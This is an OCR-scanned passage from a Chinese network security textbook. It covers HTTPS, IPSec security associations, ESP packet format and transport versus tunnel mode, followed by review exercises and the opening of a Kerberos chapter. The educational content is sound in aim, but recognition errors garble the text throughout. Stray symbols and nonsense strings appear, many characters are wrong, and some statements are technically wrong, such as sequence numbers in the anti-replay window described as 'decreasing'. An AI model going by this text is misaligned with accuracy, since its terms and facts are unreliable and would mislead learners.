杂 的 是 ，OpenSSL 是 应 用 最 广泛 的 TLS 实现 。 使 用 OpenSSL 的 TLS 服务 器 包括 金融 、 证 券 
交易 、 个 人 与 企业 电子 邮件 、 社 交 网 络 、 银 行 、 网 上 购物 和 政府 机 构 等 。 据 估计 ， 三 分 之 二 的 
Internet Web 服务 器 都 使 用 了 OpenSSL， 由 此 可 见 该 问题 的 严重 性 〈[GOOD14])。 


22.4 HTTPS 


HTTPS (HTTP 建立 在 SSL 之 上 )， 是 指 HTTP 和 SSL 的 组 合 ， 用 以 实现 Web 浏览 器 和 
Web 服务 器 之 间 的 安全 通信 。HTTPS 功能 已 经 在 所 有 的 现代 浏览 器 中 实现 ， 其 应 用 取决 于 
Web 服务 器 是 否 支 持 HTTPS 通信 。 

Web 浏览 器 用 户 所 见 到 的 主要 区 别 是 URL (统一 资源 定位 符 ) 地 址 是 以 httpsy 开始 ， 而 不 是 
http:/。 一 般 的 HTTP 连接 使 用 80 端口 ， 而 HTTPS 规定 使 用 443 端口 ， 这 个 端口 可 以 调用 SSL. 

一 旦 使 用 HTTPS， 通 信 中 下 列 元 素 将 被 加 密 : 

被 请 求 文档 的 URL 

文档 的 内 容 

浏览 融 表 单 的 内 容 (由 浏览 器 用 户 填 写 ) 

由 浏览 需 发 送 到 服务 顺和 由 服务 器 发 送 到 浏览 需 的 cookie 
HTTP 头 的 内 容 

在 文献 RFC 2818 中 记录 了 HTTPS, HTTP 建立 在 TLS 之 上 (HTTP over TSL，2000 年 )。 
在 SSL 和 TSL 上 使 用 HTTP 没有 本 质 的 区 别 ， 两 种 实现 都 称 为 HTTPS. 


22.4.1 连接 开始 


对 于 HTTPS 而 言 ， 代 理 可 以 充当 HTTP 客户 端 ， 也 可 以 充当 TLS 客户 端 。 客 户 端 首先 向 
服务 妖 的 一 个 端口 开启 一 个 连接 ， 接 着 发 送 一 个 TLS ClientHello 请 求 ， 开 始 TLS 握手 过 程 。 
TLS 握手 结束 时 ， 客 户 端 可 以 接着 发 出 第 一 个 HTTP 请 求 。 所 有 的 HTTP 数据 作为 TLS 数据 
被 发 送 。 并 且 都 应 该 遵从 正常 的 HTTP 行为 (包括 保持 连接 )。 

我 们 应 该 清楚 ，HTTPS 的 连接 有 三 级 。 在 HTTP 级，HTTP 客户 端 向 HTTP 服务 器 请 求 
连接 ,是 通过 向 下 一 个 最 低层 发 送 连接 请 求实 现 。 典 型 地 ， 下 一 个 最 低层 是 TCP， 但 也 可 以 
J€ TLS/SSL, Æ TLS 级 ， 需 建立 一 个 TLS 客户 端 和 TLS 服务 器 端的 会 话 ， 这 个 会 话 在 任何 时 
候 都 可 以 同时 支持 一 个 或 多 个 连接 。 正 如 我 们 看 到 的 ，TLS 请 求 建立 一 个 连接 是 从 在 客户 端的 
TCP 实体 与 TCP 服务 器 间 建 立 TCP 连接 开始 的 。 


22.4.2 连接 关闭 


HTTP 客户 端 或 服务 器 是 通过 在 HTTP 记录 中 添加 记录 Connection : Close 来 表明 连接 将 被 
关闭 的 。 这 表明 连接 将 在 该 记录 发 出 之 后 关闭 。 

HTTPS 连接 的 关闭 ， 要 求 关闭 与 远 端 TLS 对 等 实体 的 连接 ， 包 括 关闭 正在 使 用 的 TCP 
连接 。 在 TLS 级， 恰当 的 关闭 连接 的 方式 是 在 每 一 端 使 用 TLS 警告 协议 发 送 close_notify 警 
告 消 息 。TLS 实现 在 关闭 连接 之 前 必须 启动 警告 消息 的 交换 步 又。 在 发 送 关闭 警告 消息 之 后 ， 
TLS 实现 可 以 在 无 须 等 待 对 等 实体 发 送 其 管理 警告 消息 的 情况 下 关闭 连接 ， 并 产生 一 个 消息 
“incomplete close”。 注 意 ， 这 样 做 的 一 个 实现 可 以 选择 重用 该 会 话 。 这 种 做 法 仅 在 应 用 程序 知 
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道 (一 般 是 通过 检测 HTTP 消息 的 边界 值 ) 其 接收 到 所 有 关心 的 数据 时 才 使 用 。 

HTTP 客户 端 也 必须 能 够 处 理 这 样 的 情况: 在 没有 事先 收 到 close notify 警告 信息 和 
Connection : close 提示 标志 的 情况 下 ， 正 在 使 用 的 TCP 连接 被 终止 。 这 种 情况 可 能 是 由 于 服务 
的 编程 错误 引起 的 或 者 是 由 于 通信 错误 而 导致 的 连接 中 断 。 然 而 ， 未 宣布 的 TCP 关闭 可 能 会 
导致 某 种 攻击 ， 因 此 在 这 种 情况 发 生 时 HTTPS 客户 端 要 发 出 某 种 安全 警告 。 


22.5 IPv4 和 1Pv6 的 安全 性 
22.5.1 IP 安全 概述 


Internet 团体 在 很 多 应 用 领域 开发 了 专用 安全 机 制 ， 包 括 电 子 邮件 ( S/MIME) 客户 端 / 服 
Får (Kerberos), Web 访问 (SSL) 及 其 他 应 用 。 然 而 ， 用 户 担 心 没 有 安全 协议 层 的 应 用 会 有 
一 些 安全 问题 。 例 如 ， 一 个 企业 可 以 采取 一 定 的 方法 运行 一 个 安全 的 、 专 用 的 TCP/IP 网 络 ， 
采取 的 方法 有 拒绝 与 不 可 信 站 点 连接 、 对 离开 上 述 企业 的 包 进 行 加 密 和 对 进入 企业 的 包 进 行 认 
证 等 。 通 过 在 IP 级 实现 安全 ,一 个 组 织 不 仅 能 保证 应 用 安全 机 制 的 网 络 的 安全 ， 也 能 保证 许 
多 没有 安全 机 制 的 网 络 的 安全 。 

为 了 解决 这 些 问题 ，Internet 体系 结构 委员 会 ( Internet Architecture Board, IAB) 认为 下 一 
代 IP 中 应 该 包含 认证 和 加 密 等 必要 的 安全 特征 ， 这 些 已 经 在 已 发 行 的 IPv6 PSL. SISA 
是 ， 这 些 安全 能 力 被 设计 为 在 当前 的 IPv4 和 将 来 的 IPv6 上 都 可 以 使 用 。 这 就 意味 着 供应 商 现 
在 就 可 以 提供 这 些 特征 ， 而 且 现 在 他 们 的 产品 中 的 确 具 有 了 一 些 IPSec 的 能 力 。 

IP 级 安全 包含 了 三 个 应 用 领域 认证、 机密 性 和 密 钥 管理 。 认 证 机 制 确保 一 个 接收 到 的 
包 ， 的 确 是 报头 上 标识 的 源 地 址 的 参与 实体 发 出 的 。 此 外 ， 认 证 机 制 还 确保 了 包 在 传输 过 程 中 
没有 被 算 改 。 机 密 性 设备 使 正在 通信 的 结 点 对 消息 加 密 ， 保 证 消息 在 结 点 之 间 的 传输 不 被 第 三 
方针 听 。 密 钥 管 理 设备 主要 与 密 钥 的 安全 交换 相关 。 当 前 版 本 的 IPSec 称 为 IPSecv3， 包 括 认 
证 和 机 密 性 。 密 钥 管 理 是 由 Internet 密 钥 交换 标准 IKEv2 协议 提供 的 。 

我 们 首先 概述 IPSec (IP Security) 的 体系 结构 。 接 下 来 学 习 一 些 技 术 细 节 。 附 录 下 回顾 了 
Internet 协议 。 

IPSec 的 应 用 IPSec 提供 了 能 在 LAN、 公 用 和 专用 的 WAN 以 及 Internet 上 相互 安全 通 
信 的 能 力 。 它 的 用 途 包 括 如 下 方面 : 

© 分 支 机 构 通过 Internet 安全 接 入 : 一 个 公司 可 以 在 Internet 上 或 公共 WAN 上 建立 一 个 

安全 的 虚拟 专用 网 络 。 这 使 得 一 个 公司 更 依赖 于 Internet 并 减少 对 专用 网 的 需求 ， 从 而 
节约 成 本 和 网 络 管理 费用 。 

o 通过 Internet 进行 安全 远程 访问 : 这 使 得 使 用 IPSec 协议 的 终端 用 户 可 以 在 本 地 回 
Internet 服务 提供 商 (ISP) 提出 请 求 ， 以 获得 对 公司 网 络 的 安全 访问 权 。 这 减少 了 出 差 
员工 和 远程 通信 者 的 费用 。 

与 合作 伙伴 建立 企业 间 联 网 和 企业 内 部 联网 接 入 : 使 用 IPSec 可 以 在 各 个 组 织 之 间 实 
现 安全 的 通信 ， 确 保 认 证 和 机 密 性 ， 并 提供 密 钥 交换 机 制 。 
e 加 强 电子 商务 安全 : 尽管 一 些 Web 站 点 和 电子 商务 应 用 已 经 内 置 了 安全 协议 , 但 是 
IPSec 的 使 用 将 提高 这 些 应 用 的 安全 性 。 

使 得 IPSec 能 够 支持 这 些 不 同安 全 应 用 的 基本 特性 是 ， 它 能 在 他 层 对 所 有 的 流量 进行 加 
密 和 认证 。 因 此 ， 这 样 能 保证 所 有 分 布 式 应 用 ， 包 括 远程 登录 、 客 户 端 /服务 硕 、 电 子 邮 件 、 
文件 传输 和 Web 访问 等 都 是 安全 的 。 图 9-3 是 一 个 IPSec 的 典型 应 用 场景 。 

IPSec 的 优点 IPSec 的 优点 包括 以 下 几 个 方面 : 
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护 。 在 公司 或 工作 组 内 部 的 通信 不 会 产生 与 安全 相关 的 开销 。 
e 如 果 所 有 的 外 部 流量 必须 使 用 IP 且 防 火 墙 是 由 Internet 进入 组 织 内 部 的 唯一 人 口 ， 则 
在 防火 墙 内 的 IPSec 难以 被 绕 过 。 
IPSec 在 传输 层 (TCP. UDP) 之 下 ， 对 所 有 应 用 都 是 透明 的 。 当 IPSec 应 用 到 防火 墙 
或 路 由 器 上 时 ， 不 需要 对 用 户 系统 和 服务 需 系 统 的 软件 做 任何 改动 。 即 使 终端 系统 中 
使 用 IPSec， 上 层 软件 ， 包 括 应 用 软件 ， 也 将 不 会 受到 影响 。 
IPSec 对 终端 用 户 是 透明 的 ， 这 就 不 必 对 用 户 进 行 安 全 机 制 的 培训 ， 如 发 放 基 于 每 个 用 
户 的 密 钥 资料 (keying material)， 或 当 用 户 离 开 该 组 织 时 撤销 密 钥 资 料 。 

e 如 果 有 必要 ，IPSec 可 以 为 个 人 用 户 提 供 安 全 。 这 对 网 外 员工 有 用 ， 对 在 组 织 内 部 为 一 
些 敏感 的 应 用 建立 一 个 安全 的 专用 网 络 也 是 非常 有 用 的 。 

路 由 应 用 ”除了 支持 终端 用 户 和 保护 上 述 提 到 的 系统 和 网 络 外 ，IPSec 在 网 络 互联 所 需 的 
路 由 体系 结构 中 扮演 了 一 个 非常 关键 的 角色 。[HUIT98] 表 列 出 了 使 用 IPSec 的 例子 。IPSec 可 
以 保证 : 

e 路 由 广播 〈 新 的 路 由 器 公告 它 的 存在 ) 来 目 于 授权 的 路 由 硕 。 

o 邻居 广播 〈 路 由 需 试 图 建立 或 维护 与 其 他 的 路 由 区 域 中 的 路 由 融 的 邻居 关系 ) 来 目 于 授 

权 的 路 由 需 。 

e 重 定向 消息 来 源 于 初始 数据 包 所 发 送 到 的 路 由 需 。 

e 路 由 更 新 无 法 伪造 。 

如 果 没 有 这 些 安全 措施 ， 攻 击 者 就 可 以 阻 断 通信 或 者 转移 某 些 流量 。 路 由 协议 (比如 
OSPF) 应 该 在 由 IPSec 定义 的 路 由 器 间 安 全 关联 上 运行 。 


22.5.2 IPSec 的 范围 


IPSec 提供 了 两 种 主要 的 功能 : 一 是 被 称 作 封装 安全 载 和 倚 ( Encapsulating Security Payload, 
ESP) 的 认证 /加 密 组 合 功能 ; 二 是 密 钥 交换 功能 。 对 虚拟 专用 网 络 而 言 ， 认 证 和 加 密 通 常 都 
是 要 求 的 ， 因 为 它 对 (1 ) 保证 非 授 权 用 户 不 能 渗透 虚拟 专用 网 和 (2 ) 保证 Internet E Ég IT 
者 不 能 读 取 虚拟 专用 网 上 发 送 的 消息 都 是 非常 重要 的 。 此 外 ， 还 有 一 个 仅 认证 功能 ， 使 用 认证 
报头 (Authentication Header, AH) 来 实现 。 由 于 消息 认证 是 由 ESP 提供 的 ，AH 的 使 用 已 被 废 
弃 。 所 以 为 保持 向 后 兼容 性 ， 它 是 包含 在 IPSecv3 中 的 ， 但 不 应 使 用 于 新 的 应 用 程序 。 本 章 我 
们 不 讨论 AH。 

密 钥 交换 功能 允许 手动 交换 密 钥 ， 也 人 允许 自动 交换 密 铀 。 

IPSec 说 明 书 非常 复杂 且 包 含 大 量 文 档 。 其 中 最 重要 的 是 : 

è RFC 2401 (Internet 协议 安全 体系 结构 ，1998 年 ) 

© RFC 4302 (IP 认证 头 ，2005 年 ) 

è RFC 4303 (IP 封装 安全 载荷 (IP Encapsulating Security Payload, ESP), 2005 年 ) 

è RFC 4306 (Internet 密 钥 交换 (Internet Key Exchange, IKEv2 ) Wit, 2005 年 ) 

W, RIX IPSec 中 最 重要 的 元 素 进行 了 概述 。 


22.5.3 ”安全 关联 


在 IP 的 认证 和 机 密 性 机 制 中 出 现 的 一 个 核心 概念 是 安全 关联 (Security Association, SA). 
关联 是 发 送 方 和 接收 方 之 间 的 单 问 关系 ， 该 关联 为 两 者 间 的 通信 流 提 供 安 全 服务 。 如 果 需 要 双 
向 安全 关联 ， 则 需要 建立 两 个 安全 关联 。 安 全 服务 可 以 使 用 ESP 来 提供 SA, 
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一 个 安全 关联 由 如 下 三 个 参数 唯一 确定 : 


安全 参数 索引 (Security Parameters Index, SPI): 一 个 分 配给 SA 的 比特 串 ， 它 仅 在 本 
地 有 意义 。 该 SPI 由 ESP 报头 携带 ， 使 得 接收 系统 能 选择 合适 的 SA， 接收 到 的 包 将 在 
该 SA 下 处 理 。 

IP 目的 地 址 (IP destination address): 目前 ， 只 允许 使 用 单 播 (unicast) 地 址 ， 这 是 
SA 的 目的 端的 地 址 ， 目 的 端 可 以 是 终端 用 户 系统 ， 或 者 是 像 防火 增 或 路 由 需 的 网 络 
系统 。 

协议 标识 〈protocol identifier): 它 标识 该 关联 是 否 是 一 个 AH 安全 关联 或 ESP 安全 关联 。 


因此 ， 在 任何 卫 包 中 ， 安 全 关联 由 IPv4 或 IPv6 报头 中 的 目的 地 址 和 扩展 头 部 (AH 或 
ESP) 中 的 SPI 唯一 标识 。 

在 每 一 个 IPSec 实现 中 ， 有 一 个 安全 关联 数据 库 (SAD)， 它 定义 每 个 与 SA 相关 的 参数 。 
一 个 安全 关联 通常 由 如 下 参数 定义 : 


序列 号 计数 器 (sequence number counter): 一 个 32 比特 的 数值 ， 它 被 用 来 生成 AH 或 
ESP 报头 中 序列 号 域 。 

序列 计数 器 溢出 (sequence counter overflow): 这 是 一 个 标识 ， 用 于 表示 序列 号 计数 需 
溢出 是 否 应 该 生成 一 个 可 审计 的 事件 ， 并 且 阻 止 在 此 SA 上 继续 传输 包 。 

反 重 放 窗 口 (antireplay window): 用 于 判定 一 个 到 达 的 AH 或 ESP 数据 包 是 否 是 重 放 。 
采取 的 方法 是 定义 一 个 变化 的 窗口 ， 其 内 的 序列 号 必须 是 递减 的 。 


e AH 信息 (AH information): 认证 算法 、 密 钥 、 密 钥 生 存 期 和 AH 用 到 的 相关 参数 。 
e ESP 信息 (ESPinformation) : 加 密 和 认证 算法 、 密 钥 、 初 始 值 、 密 钥 生 存 期 和 ESP 用 


到 的 相关 参数 。 

安全 关联 的 生存 期 (lifetime of this security association) :一 个 时 间 间 隅 或 者 字 节 计数 。 
超过 此 值 后 ， 一 个 SA 必须 被 一 个 新 的 SA (和 新 的 SPI 代替 或 者 结束 ， 并 加 上 这 些 动 
作 将 发 生 的 指示 。 

IPSec 协议 模式 (IPSec protocol mode): 隧道 模式 、 传 输 模 式 或 者 通配符 模式 (在 所 有 
的 实现 中 均 需 要 )。 这 些 模式 将 在 后 续 的 章节 中 进行 详细 的 讨论 。 

最 大 传输 单元 路 径 (path MTU): 最 大 传输 单元 (不 需要 进行 分 段 传输 的 最 大 包 长 度 ) 
BSE AIS hit AEE o 


分 发 密 钥 所 使 用 的 密 钥 管理 机 制 只 能 通过 安全 参数 索引 将 认证 和 保密 机 制 相 结合 。 因 此 认 
证 和 保密 机 制 管 理 被 规定 为 与 任何 关键 的 安全 管理 机 制 无 关 。 


22.54 ”封装 安全 载荷 


H He 4> aX (Encapsulating Security Payload, ESP) 提供 保密 服务 ， 包 括 消息 内 容 保密 
和 流量 限制 保密 。 作 为 可 选 的 特性 ，ESP 还 可 以 提供 认证 服务 。 
图 22-8 给 出 了 ESP 包 的 格式 。 它 包括 如 下 域 : 


安全 参数 索引 (security parameter index)( 32 位 ): 标识 一 个 安全 关联 。 

序列 号 (sequence number)( 32 位 ): 一 个 单调 递增 计数 值 。 

载荷 数据 (可 变 )(payload data(variable)): 这 是 一 个 传输 层 的 段 (传输 模式 ) RA PE, 
它 是 通过 加 密 进 行 保护 的 。 

填充 (padding) (0~255 FÈ): 如 果 加 密 算法 要 求 明 文 是 一 些 8 位 字 节 的 整数 倍 时 可 
能 需要 。 

填充 长 度 (pad length)( 8 位 ): 在 域 前 标明 此 域 填充 数据 的 长 度 。 
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o 邻接 报头 (next header)( 8 位 ): 通过 标识 载荷 中 的 第 一 个 报头 来 标识 包含 在 载荷 数据 域 
中 的 数据 类 型 (如 IPv6 中 的 扩展 报头 或 如 TCP 这样 的 上 层 协 议 等 )。 

© 认证 数据 (可 变 ) (authentication data ( variable) ) : 一 个 可 变 长 的 域 (必须 为 32 位 字 
长 的 整数 倍 )， 它 包含 完整 性 校 验 值 (Integrity Check Value, ICV). ICV 的 计算 参量 为 
ESP 包 中 除 认 证 数据 外 的 其 他 部 分 。 


位 : 0 16 24 31 


安全 参数 索引 (SPI) 
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认证 数据 ( 可 变 ) 


图 22-8 IPSec ESP 格式 





22.5.5 ”传输 模式 和 隧道 模式 


ESP 支持 两 种 使 用 模式 : 传输 模式 和 隧道 模式 。 接 下 来 我 们 先 给 出 一 个 简要 的 概述 。 

传输 模式 ”传输 模式 主要 是 针对 上 层 的 ( upper-layer) 协议 提供 保护 ， 也 就 是 说 ， 传 输 模 
式 将 保护 扩展 到 卫 包 的 载荷 。 例 子 包括 TCP 段 或 者 UDP 段 ， 它 们 在 主机 协议 栈 中 运行 在 IP 
层 之 上 。 一 般 ， 传 输 模 式 用 于 主机 之 间 端 到 端的 通信 (例如 ， 客 户 端 与 服务 器 之 间或 者 两 个 
工作 站 之 间 )。 当 一 人 台 主 机 在 IPv4 上 运行 ESP 时 ， 载 荷 通常 是 直接 在 IP 头 之 后 。 对 于 IPv6， 
载荷 则 通常 紧 跟 着 耻 头 和 了 JPv6 扩展 头 出 现 ， 可 能 会 被 加 密 保 护 ， 而 目的 选择 头 可 能 是 一 个 
例外 。 

ESP 在 传输 模式 下 会 对 IP 载荷 加 密 和 有 选择 地 进行 认证 ， 但 对 IP 头 不 进行 相应 处 理 。 

隧道 模式 ”隧道 模式 是 对 整个 卫 包 提供 保护 。 为 了 实现 该 目标 ， 在 ESP 域 附 在 IP 
后 ， 将 整个 包 和 安全 域 作 为 一 个 新 的 带 有 新 的 外 部 IP 头 的 外 部 卫 包 的 载荷 处 理 。 整 个 原来 的 
(内 部 的 ) 包 会 通过 一 个 隧道 从 IP 网 络 的 一 个 结 点 流转 到 另 一 个 结 点 。 在 其 转移 的 路 线 上 没有 
路 由 器 会 检查 其 内 部 IP 头 。 因 为 原始 的 包 被 封装 成 一 个 新 的 、 更 大 的 包 ， 这 个 包 具 有 与 原来 
的 包 根 本 不 同 的 源 地 址 和 目标 地 址 ， 从 而 增加 了 安全 性 。 当 安全 关联 中 一 个 或 两 个 都 是 安全 网 
关 时 ， 例 如 在 防火 墙 或 者 路 由 器 实现 IPSec 功能 时 ， 就 可 以 使 用 隧道 模式 。 在 隧道 模式 下 ， 防 
火 墙 之 后 的 网 络 中 的 大 多 数 主机 ， 丝 可 以 进行 安全 通信 ， 而 无 须 实现 IPsec。 主 机 产生 的 未 被 
保护 的 包 在 外 部 网 络 中 采用 隧道 模式 流转 ， 安 全 关联 由 在 局 域 网 边缘 的 防火 墙 或 安全 路 由 器 中 
的 IPSec 软件 创建 。 

下 面 是 隧道 模式 的 IPSec 如 何 运 行 的 例子 。 网 络 的 一 台 主 机 A 产生 了 一 个 IP 包 ， 其 目标 
地 址 是 男 一 个 网 络 中 主机 B。 这 个 包 选 择 了 从 原来 的 主机 A 到 所 在 网 络 的 边界 的 一 人 台 防 火 墙 
或 安全 路 由 器 的 流转 路 径 。 防 火 墙 过 滤 所 有 流出 的 包 以 确定 对 其 进行 IPSec 处 理 。 如 果 A 到 B 
的 包 需 要 使 用 IPSec， 防火墙 对 其 进行 IPSec 处 理 ， 并 用 外 部 IP 头 对 其 进行 封装 ， 这 个 外 部 IP 
包 的 源 地 址 是 这 人 台 防 火 墙 ， 目 标 地 址 可 能 是 B 所 在 局 域 网 的 边缘 防火 墙 。 这 个 封装 好 的 包 就 
选择 能 够 到 达 B 的 防火 墙 的 路 径 ， 流 转 中 经 过 的 路 由 器 只 检查 其 外 部 了 下头 。 在 B 的 防火 墙 ， 
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外 部 IP 包头 被 去 除 ， 内 部 包 被 发 送 到 主机 B。 


ESP 在 隧道 模式 下 会 对 整个 耳 包 (包括 IP Sk) 加 密 和 有 选择 地 进行 认证 。 


226 关键 术语 、 复 习题 和 习题 


关键 术语 
Administrative Management Domain (ADMD, ff #X fay ) 
政 管理 域 ) Multipurpose Internet Mail Extension ( MIME， 多 用 
Domain Name System (DNS, 域名 系统 ) 途 Internet 邮件 扩展 ) 
DomainKeys Identified Mail ( DKIM， 域 名 密 钥 识 Secure Sockets Layer (SSL， 安 全 套 接 层 ) 
别 邮件 ) Transport Layer Security (TLS ， 传 输 层 安全 ) 
Encapsulating Security Payload ( ESP， 封 装 安全 
复习 题 
22.1 列 出 S/MIME 支持 的 4 个 功能 。 
22.2 什么 是 R64 (radix-64 ) 转换 ? 
22.3 ”为 什么 R64 (radix-64 ) 转换 对 电子 邮件 应 用 非常 有 用 ? 
22.4 什么 是 DKIM ? 
22.5 SSL 由 哪些 协议 构成 ? 


22.6 
22.7 
22.8 
22.9 
22.10 
22.11 
习题 
22.1 


22.2 


22.3 


22.4 


SSL 连接 和 SSL 会 话 之 间 有 什么 不 同 ? 
SSL 记录 协议 可 以 提供 哪些 服务 ? 


HTTPS 的 目的 是 什么 ? 
IPSec 提供 哪些 服务 ? 
什么 是 IPSec 安全 关联 ? 
在 IPSec 中 提供 认证 的 是 哪 两 种 方式 ? 
Æ SSL 和 TLS 中 ， 为 什么 有 一 个 单独 的 变更 密码 规范 协议 ， 而 不 是 把 变更 密码 规范 (chang _ 


cipher_spec) 消息 包含 在 握手 协议 中 ? 
考虑 下 列 Web 安全 性 威胁 ， 并 通过 SSL 的 每 一 个 详细 特征 描述 每 个 威胁 是 怎么 解决 的 ? 
a. Man-in-the-middle 攻击 : 攻击 者 在 密 钥 交换 期 间 进 行 干预 ， 假 冒 客户 端 到 服务 器 ， 假 冒 服务 器 
到 客户 端 。 
b. 口令 嗅 探 : 在 HTTP 或 其 他 应 用 传输 的 口令 被 窃听 。 
c. IP 欺骗 利用 伪造 的 IP 地 址 欺骗 主机 接收 伪造 的 数据 。 
d. IP 支持 : 在 两 台 主 机 间 主 动 的 认证 连接 被 打 断 ， 攻 击 者 奉 代 其 中 一 台 主 机 。 
e. SYN 洪 泛 攻击 : 攻击 者 发 送 TCP SYN 消息 请 求 连接 ， 但 是 不 回应 最 后 的 消息 建立 完整 的 连接 。 
被 攻击 TCP 模块 一 般 要 持续 半 连 接 (half-open connection) 状态 数 分 钟 。 重 复 SYN 消息 可 以 阻 
塞 TCP 模块 。 
在 本 章 所 学 知识 的 基础 上 , 在 SSL 中 对 已 到 达 接 收 者 的 无 序 的 SSL 记录 块 进行 重新 排序 是 可 能 的 
吗 ? 如 果 可 以 ， 解 释 一 下 如 何 做 。 如 果 不 能 ， 为 什么 ? 
进行 重 放 攻 击 时 ， 攻 击 者 获取 了 一 个 认证 包 的 备份 ， 然 后 把 它 传 输 到 想 要 的 目的 地 。 双 份 的 收据 和 认证 
卫 包 ， 在 某 些 方式 下 可 以 扰乱 服务 或 者 产生 一 些 无 法 预料 的 结果 。 在 IPSec 认证 报头 中 的 序列 号 域 的 
设计 是 用 来 阻止 这 种 攻击 的 。 因 为 IP 是 一 个 无 连接 的 、 不 可 靠 的 服务 ， 协 议 不 能 保证 每 个 包 都 被 顺 
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序 传输 或 保证 所 有 的 包 被 传输 。 因 此 IPSec 认证 文档 规定 接收 者 应 该 使 用 大 小 为 W(W 默认 值 为 64 ) 
的 窗口 。 窗 口 的 右边 缘 表示 最 高 的 序列 号 N， 到 目前 为 止 接收 了 一 个 有 效 的 包 。 对 任何 一 个 序列 号 
在 N-W+l 和 NN 之 间 的 已 经 正确 接收 的 (也 就 是 通过 了 认证 ) 包 ， 在 窗口 中 相应 的 槽 被 标记 ( 见 
图 22-9 )。 从 图 中 试 着 推出 ， 当 一 个 包 被 接收 到 时 人 处理 过 程 是 如 何 进 行 的 ? 解释 一 下 如 何 应 对 重 放 攻 击 。 


如 果 到 右边 的 有 效 包 
被 接收 ， 前 进 窗 口 


固定 窗口 大 小 W 





如 果 有 效 包 被 接收 就 标记 如 果 有 效 包 没 有 被 接收 就 不 标记 
图 22-9 反 重 放 机 制 


22.5 IPSec ESP 可 以 用 于 两 种 不 同 的 操作 模式 。 在 第 一 种 模式 中 ，ESP 被 用 来 加 密 或 有 选择 地 认证 IP 
传送 的 数据 (例如 ，TCP 段 )。 由 于 这 种 模式 应 用 IPv4， 因 此 ESP 报头 被 插入 到 IP 包 中 ， 紧 挨 着 
位 于 传输 层 ( transport-layer) 报头 (如 TCP、UDP 和 ICMP 等 ) 之 前 ,并且 在 IP 包 之 后 紧 跟 的 是 
ESP 跟踪 器 (填充 、 填 充 长 度 和 邻接 报头 域 )。 如 果 认 证 已 选择 ，ESP 认证 数据 域 被 加 到 ESP 跟踪 
器 之 后 。 整 个 传输 层 段 加 上 ESP 跟踪 器 被 加 密 。 认 证 包括 所 有 的 密 文 加 上 ESP 报头 。 在 第 二 种 模 
AF, ESP 用 来 加 密 整个 IP 包 。 对 于 这 种 模式 ，ESP 报头 放 到 包 的 前 面 ， 然 后 包 附 加 ESP 跟踪 器 
被 加 密 。 这 种 方法 可 以 用 来 对 抗 流量 分 析 。 因 为 IP 报头 包含 了 目的 地 址 和 可 能 的 源 路 由 方向 指示 
和 一 跳 一 跳 的 选择 信息 ， 它 是 不 可 能 简单 地 传输 加 密 的 卫 包 (前面 附加 了 ESP 头 ) 的 。 中 间 路 由 
将 不 能 处 理 这 样 的 包 。 因 此 用 一 个 包含 足够 路 由 信息 的 IP 新 头 封装 整个 块 (ESP 报头 加 上 密 文 加 
上 认证 数据 ， 如 果 出 现 ) 是 非常 重要 的 。 建 议 应 用 这 两 种 模式 。 

22.6 把 radix-64 转换 为 一 种 加 密 方式 。 在 这 种 情况 下 ， 没 有 密 钥 。 设 想 攻击 者 仅仅 知道 一 些 置换 算法 被 
用 来 加 密 英文 文本 而 猜 不 到 是 R64。 这 个 算法 对 抗 密码 分 析 ， 其 有 效 性 如 何 ? 

22.7 在 S/MIME 中 一 种 代替 radix-64 转换 的 是 引用 转换 编码 (quoted-printable transfer coding)。 前 两 种 
1. 通用 8 位 表示 法 : 这 个 规则 是 在 没有 其 他 规则 适用 时 应 用 。 任 何 字符 由 一 个 两 位 的 十 六 进 制 表 

示 的 八 位 组 的 值 的 一 个 平等 的 标记 表示 。 例 如 ，ASCII 码 十 进 制 12 的 8 位 值 由 “ 王 0C” 表 示 。 
2. 字面 表 示 : 在 十 进 制 33 1 到 126 (“~”) 范围 的 任何 字符 ， 十 进 制 61 (“=”) 用 ASCII 
字符 表示 。 保 留 的 规则 处 理 空格 和 换行 。 解 释 引 用 和 base 64 编码 之 间 的 不 同 。 
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学 习 目标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
o 概述 Kerberos 的 基本 操作 ; 


@ 比较 Kerberos 版 本 4 Fo Kerberos 版 本 5 的 功能 ; 
o 理解 X.509 证 书 的 格式 和 功能 ; 
© 解释 公 钥 基础 设施 概念 。 


本 章 介 绍 一 些 为 支持 基于 网 络 的 认证 和 数字 签名 而 开发 的 认证 功能 。 
首先 介绍 最 早 且 被 最 广泛 使 用 的 服务 : Kerberos ; 然后 介绍 X.509 AHER; 最 后 ， 介 绍 
公 钥 基础 设施 (PKI) 的 概念 。 


23.1 Kerberos 


组 织 可 以 使 用 很 多 种 方法 保证 联网 的 服务 右 和 主机 的 安全 。 系 统 可 以 使 用 一 次 性 口令 来 阻 
止 猜 解 口令 或 捕获 用 户口 令 的 企图 。 这 些 系统 由 于 需要 使 用 专门 的 设备 (例如 ， 智 能 卡 或 者 同 
步 口 令 生 成 器 等 ) 来 操作 ， 因 此 在 通常 的 组 网 使 用 中 一 直 没 有 被 人 们 接受 。 另 一 种 方法 是 使 用 
生物 测量 (biometric) 系统 。 这 是 基于 一 些 生理 特 征 的 验证 或 识别 身份 的 自动 方法 ， 其 中 的 生 
理 特征 包括 指纹 、 虹 膜 ， 或 者 行为 特征 ， 如 笔迹 或 按键 节奏 等 。 需 要 强调 的 是 ， 这 些 系 统 也 需 
要 专门 的 设备 。 

另 一 种 解决 这 个 问题 的 方法 ， 是 使 用 绑 定 在 安全 认证 服务 器 上 的 认证 软件 。 这 种 方法 被 
Kerberos 采用 。Kerberos 最 初 是 由 MIT 开发 的 ， 它 是 一 个 在 公共 领域 和 商业 中 都 得 到 文 持 的 
软件 工具 。Kerberos 作为 一 个 Internet 标准 已 经 发 布 ， 并 且 是 远程 认证 的 事实 上 的 标准 ， 包 括 
作为 微软 活动 目录 服务 的 一 部 分 。 

Kerberos 的 整个 方案 就 是 一 个 可 信任 的 第 三 方 认证 服务 。 从 客户 端 和 服务 器 信任 Kerberos 
作为 它们 相互 认证 的 媒介 的 意义 上 来 看 ，Kerberos 方案 是 可 值得 信任 的 。 本 质 上 ，Kerberos 要 
求 用 户 调用 每 个 服务 时 需要 证 明 他 的 身份 ， 并 且 可 随意 要 求 服 务 器 向 客户 端 证 明 它 们 的 身份 。 


23.1.1 Kerberos 协议 


Kerberos 使 用 了 一 个 包括 客户 端 、 应 用 服务 器 和 一 个 Kerberos 服务 器 的 协议 。 这 个 协议 
的 复杂 性 反映 了 这 样 一 个 事实 : 敌手 有 许多 威胁 安全 的 方法 。Kerberos 是 被 设计 用 来 对 抗 针对 
